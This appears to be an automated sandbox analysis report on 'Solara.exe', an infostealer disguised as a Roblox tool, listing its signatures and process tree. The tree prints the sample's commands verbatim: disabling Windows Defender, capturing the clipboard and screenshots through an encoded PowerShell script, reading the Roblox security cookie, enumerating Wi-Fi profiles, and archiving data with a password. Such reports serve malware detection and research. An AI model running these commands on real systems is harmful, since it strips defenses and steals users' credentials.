Analysis

  • max time kernel
    249s
  • max time network
    277s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 01:37

General

  • Target

    Solara.exe

  • Size

    6.9MB

  • MD5

    780c16117b9f06921afbfb036cbcbdc0

  • SHA1

    354ef08f78e4df580c5ea7963f879afc70757355

  • SHA256

    bf76cc6bed0022d5021eca98401a4b919ed8f22ccffdb8df570058b0796e8c6f

  • SHA512

    8add2dcc2b63c31a982aae694b2e2c675d5362200c0879217812f0778511f80ef16ff1d98a0503743edbd990efa4778c6dfd4686b0c75313c850ad9b851a833e

  • SSDEEP

    98304:VNdkwN+MdA5wqSnW0g8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DovaDJ1n6hBJ:V7V1v/B6ylnlPzf+JiJCsmFMvln6hqg7

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Solara.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1576
    • C:\Users\Admin\AppData\Local\Temp\Solara.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5060
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3860
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2328
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try again later', 0, 'Error: 5472', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3136
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Try again later', 0, 'Error: 5472', 32+16);close()"
          4⤵
            PID:4544
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1108
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5092
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3456
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3400
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:3476
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1128
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:4076
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1672
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:4084
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2992
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:3164
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1936
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3064
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4384
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:812
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2268
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2168
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4332
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:2424
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:4352
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3716
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:1136
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:4368
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:1032
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:1028
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:1368
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:2080
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:5032
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:3936
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:2516
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:3304
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:1836
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2884
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1oa1zlcr\1oa1zlcr.cmdline"
                                  5⤵
                                    PID:1780
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDBE9.tmp" "c:\Users\Admin\AppData\Local\Temp\1oa1zlcr\CSC1B6558389AA546BDB77DEEDBDD5E265.TMP"
                                      6⤵
                                        PID:5072
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2344
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3848
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:3980
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:2360
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:4356
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4264
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                            3⤵
                                              PID:1720
                                              • C:\Windows\system32\attrib.exe
                                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                                4⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:3016
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:1400
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:3672
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  3⤵
                                                    PID:3116
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      4⤵
                                                      • Enumerates processes with tasklist
                                                      PID:3720
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:672
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:2668
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:5064
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:2152
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:1016
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:944
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:2328
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4948
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                3⤵
                                                                  PID:3832
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:2232
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI15762\rar.exe a -r -hp"completemotion" "C:\Users\Admin\AppData\Local\Temp\sCKVz.zip" *"
                                                                    3⤵
                                                                      PID:2152
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        4⤵
                                                                          PID:5064
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI15762\rar.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI15762\rar.exe a -r -hp"completemotion" "C:\Users\Admin\AppData\Local\Temp\sCKVz.zip" *
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:3924
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
